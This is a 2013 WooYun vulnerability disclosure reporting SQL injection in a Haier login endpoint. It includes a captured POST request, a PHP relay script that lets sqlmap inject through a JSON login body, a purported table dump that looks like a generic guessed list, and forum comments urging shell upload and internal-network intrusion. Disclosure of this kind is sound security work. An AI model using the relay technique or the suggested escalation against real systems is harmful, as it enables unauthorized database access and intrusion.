当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034087

漏洞标题:海尔集团之14某非常重要系统很有姿势的SQL注射

相关厂商:海尔集团

漏洞作者: 小胖子

提交时间:2013-08-11 14:51

修复时间:2013-09-25 14:51

公开时间:2013-09-25 14:51

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-11: 细节已通知厂商并且等待厂商处理中
2013-08-13: 厂商已经确认,细节仅向厂商公开
2013-08-23: 细节向核心白帽子及相关领域专家公开
2013-09-02: 细节向普通白帽子公开
2013-09-12: 细节向实习白帽子公开
2013-09-25: 细节向公众公开

简要描述:

小胖子正在暴走!!
小胖子已经超越神的杀戮!!求求谁去杀了他吧!!

详细说明:

系统地址:http://evs.haier.net/easp/uiloader/login.html海尔电子核销系统
在登陆的时候,用单引号登陆,就报错了。
本来以为会很简单,用一般的post注入就搞定。

.png


但是我还是太傻太天真,抓到包的那一刻我眼泪掉下来。

POST http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm HTTP/1.1
Accept: */*
Referer: http://evs.haier.net/easp/uiloader/login.html
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: evs.haier.net
Content-Length: 40
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=2kpTSFLPRmJ2Fn1CYrJlD1GJjhmpVG8knMRSyMzkLRDpFM40t6L2!-881110793; cctUserId=admin; cctLocale=zh
[{"userId":"admin","password":"123456"}]


传递出去的参数是这样的啊,[{"userId":"admin","password":"123456"}],SQLmap和其他的工具根本就不认啊。但是这明显就是注入啊?
智能无奈,写一个中转php文件,大爱小学生。

<?php
if (empty($_GET['id'])){
echo "vip.php?id=z7ysbsbsb";
}else{
$id=$_GET['id'];
$post_data="[{\"userId\":\"$id\",\"password\":\"123456\"}]"; $url='http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm';
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
ob_start();
curl_exec($ch);
$result = ob_get_contents() ;
ob_end_clean();
echo $result;
}
?>


这里get的ID来替换掉post里面的userid参数,来实现注入。
本地访问下看看。

.png


恩,看样子是问题不大了。
这里由于是中转注射了,本地是win的环境和php,可能检测出来跟服务器有差别。

.png


但是呢,数据是跑不掉的。

shuju.png


shuju2.png


over。

漏洞证明:

一部分数据。

Database: public
[206 tables]
+-------------------------------+
| Coefficients                  |
| DEPARTAMENTOS                 |
| DUMMY                         |
| D_PR_CUSTAS                   |
| EMPLOYEE                      |
| EPIXEIRISI                    |
| Enseignant                    |
| EventRedirect                 |
| Event_Category                |
| FUNDGROUP                     |
| Film                          |
| Firma                         |
| Fusion                        |
| Fusion8                       |
| Gruppen                       |
| HISTORY                       |
| JamPass                       |
| LIBRARY_BRANCH                |
| LT_CUSTOM1                    |
| LT_DECISAO                    |
| LT_ENCERRAMENTO               |
| LT_EQUIPES                    |
| LT_OBJETO                     |
| LT_SERIE                      |
| Lieux                         |
| MSmerge_errorlineage          |
| PROYECTO                      |
| Parameter                     |
| Pays                          |
| PropColumnMap                 |
| QRTZ_BLOB_TRIGGERS            |
| QRTZ_CRON_TRIGGERS            |
| QRTZ_FIRED_TRIGGERS           |
| ROLE                          |
| SGA_XPLAN_TPL_V$SQL_PLAN_SALL |
| States                        |
| TBLREPORTS                    |
| TRABAJA_EN                    |
| Titres                        |
| WidgetDescriptions            |
| _wfspro_admin                 |
| a_admin                       |
| abstract                      |
| admin_user                    |
| adminlogin                    |
| adminpsw                      |
| admuserinfo                   |
| articulos                     |
| attrs                         |
| auteur                        |
| badspy                        |
| bayview                       |
| be_groups                     |
| binn_maillist                 |
| binn_menu_tlevel              |
| binn_pages                    |
| binn_vote_temps               |
| bkp_String                    |
| categorie                     |
| cdb_bbcodes                   |
| cdb_itempool                  |
| cdb_pms                       |
| cdb_pmsearchindex             |
| cdb_polls                     |
| child_configs                 |
| cmContentVersionDigitalAsset  |
| cmRole                        |
| cms_member                    |
| cms_users                     |
| connections                   |
| contador                      |
| dados_estudante               |
| dbstaff                       |
| directeur                     |
| dtb_mailmaga_template         |
| dtb_news                      |
| dtb_other_deliv               |
| dtb_products_class            |
| egresado                      |
| enregistrs                    |
| equipment_type_seq            |
| esame                         |
| estado                        |
| etudiants                     |
| ew_menu                       |
| extremes                      |
| f_classtype                   |
| feedback                      |
| files_config                  |
| forums                        |
| geo_Sea                       |
| glas                          |
| guava_theme_modules           |
| id                            |
| imageCategoryList             |
| individual                    |
| inscription                   |
| jos_core_acl_aro_groups       |
| jos_core_log_searches         |
| jos_menu_types                |
| jos_messages_cfg              |
| jos_preguntas                 |
| jos_session                   |
| jos_templates_menu            |
| jos_vm_manufacturer_category  |
| jos_vm_product_reviews        |
| kpro_adminlogs                |
| licenses                      |
| lists                         |
| located                       |
| locus_data                    |
| lost_pass                     |
| mac                           |
| manutencao                    |
| melodies                      |
| membres                       |
| mgbliuyan                     |
| mucRoomProp                   |
| mushroom_testset              |
| my_lake                       |
| mymps_certification           |
| mymps_corp                    |
| mymps_crons                   |
| mymps_navurl                  |
| mymps_news_img                |
| mymps_telephone               |
| nuke_autonews                 |
| nuke_banner                   |
| nuke_bbdisallow               |
| nuke_encyclopedia_text        |
| nuke_journal_comments         |
| nuke_stats_year               |
| oe                            |
| oil_bannerclient              |
| oil_bfsurveypro_34            |
| oil_biolmed_entity            |
| oil_biolmed_measurements      |
| oil_core_acl_aro_map          |
| oil_modules                   |
| oil_session                   |
| order                         |
| ordre                         |
| papers                        |
| passwd                        |
| pc                            |
| phpbb_config                  |
| platforms                     |
| post                          |
| principal                     |
| produits                      |
| pw_attachs                    |
| pw_config                     |
| pw_forums                     |
| pw_hack                       |
| radacct                       |
| rating_track                  |
| rcpt                          |
| register                      |
| registriert                   |
| reglement                     |
| rel_paper_topic               |
| request                       |
| rss_categories                |
| rss_read                      |
| service                       |
| setting                       |
| site_iwis                     |
| solicitacaosenha              |
| spip_documents_rubriques      |
| spip_syndic                   |
| spip_types_documents          |
| spt_datatype_info             |
| spt_provider_types            |
| ssb                           |
| sse_familia                   |
| store3                        |
| store4                        |
| sysmaps                       |
| tables_priv                   |
| tbl_admins                    |
| tbl_tech                      |
| tblblogtrackbacks             |
| tblproducts                   |
| tbuseraccount                 |
| themes                        |
| time_zone_transition_type     |
| transfers                     |
| turizmi_ge                    |
| un                            |
| userInfo                      |
| user_connection               |
| user_online_newyear           |
| user_pword                    |
| user_uploads_pictures         |
| userid                        |
| utilisateurs                  |
| valhalla                      |
| vars                          |
| vcd                           |
| vcd_Log                       |
| vendor_types                  |
| vendors                       |
| webcal_entry_ext_user         |
| webcal_entry_log              |
| x_world                       |
| zl_admin                      |
+-------------------------------+

修复方案:

0x1:注入啊注入,老是在登陆框~伤了心。
0x2:5天确认周期,完了就忽略,注意时间的掌控啊!

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-08-13 15:24

厂商回复:

感谢 @小胖子 的工作。给低和5rank的原因如下:
该系统业务责任人答复原话为:“你们通过SQL注入,并没有连接上EVS的数据库,没有登录到EVS,不存在业务数据的泄漏。”
请各位白帽子持续友好监督海尔信息安全工作,非常感谢。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-08-11 15:07 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    擦。。

  2. 2013-08-11 15:08 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  3. 2013-08-11 16:21 | 夜虫儿 ( 实习白帽子 | Rank:36 漏洞数:4 | ^_^)

    这是我的第一条评论,我实在受不了你了,你给我透漏个底吧,一共有多少,我好心里有个数@小胖子

  4. 2013-08-11 16:25 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @夜虫儿 20左右

  5. 2013-08-11 16:28 | 夜虫儿 ( 实习白帽子 | Rank:36 漏洞数:4 | ^_^)

    一次性发出来吧,天天啥事也不用干了,光关注你这个漏洞了。。。。。

  6. 2013-08-11 16:30 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @夜虫儿 一次性发出来就是20rank精华=40rank 分20次发就是平均15rank + 最撸力洞主=15*20+150=450rank

  7. 2013-08-11 16:35 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @夜虫儿 宝贝,1008611个,@px1624 宝贝,我不是你这个意思,我的意思是,我看大神都有一个自己的系列,我在准备我下一个系列了,哈哈哈,羡慕嫉妒恨吧~

  8. 2013-08-11 16:44 | 夜虫儿 ( 实习白帽子 | Rank:36 漏洞数:4 | ^_^)

    @小胖子 好客山东欢迎你,没到过海底世界,别说你来过青岛!

  9. 2013-08-11 16:47 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @夜虫儿 很快我就去海尔上班了,我来找你!!!

  10. 2013-08-11 16:52 | 夜虫儿 ( 实习白帽子 | Rank:36 漏洞数:4 | ^_^)

    如果需要租房子,通知一声;如果需要找**,通知一声。

  11. 2013-08-11 17:15 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    告诉我 你积攒了多久。。。。。

  12. 2013-08-11 18:07 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小胖子 大神都是腾讯系列 新浪系列 百度系列

  13. 2013-08-11 18:26 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @px1624 你是怎么知道我下一个系列的新浪?

  14. 2013-08-11 19:44 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @小胖子 大婶,我的马甲可以借给你用!不用谢的

  15. 2013-08-11 19:56 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @zzR 好,新浪系列的就用你的马甲发!

  16. 2013-08-11 20:19 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    @小胖子 牛逼啊,各种姿势注射!

  17. 2013-09-12 17:35 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    你们通过SQL注入,并没有连接上EVS的数据库,没有登录到EVS,不存在业务数据的泄漏。

  18. 2013-09-25 19:03 | nick被注册 ( 普通白帽子 | Rank:125 漏洞数:20 | 天一)

    你们通过SQL注入,并没有连接上EVS的数据库,没有登录到EVS,不存在业务数据的泄漏.这明显就是告诉洞主:你不深入,我就不给你高分!建议下次直接拿服务器

  19. 2013-10-10 10:34 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    下次直接写个shell 进去。内网嗅探 搞挂他,看他给多少,,,,mark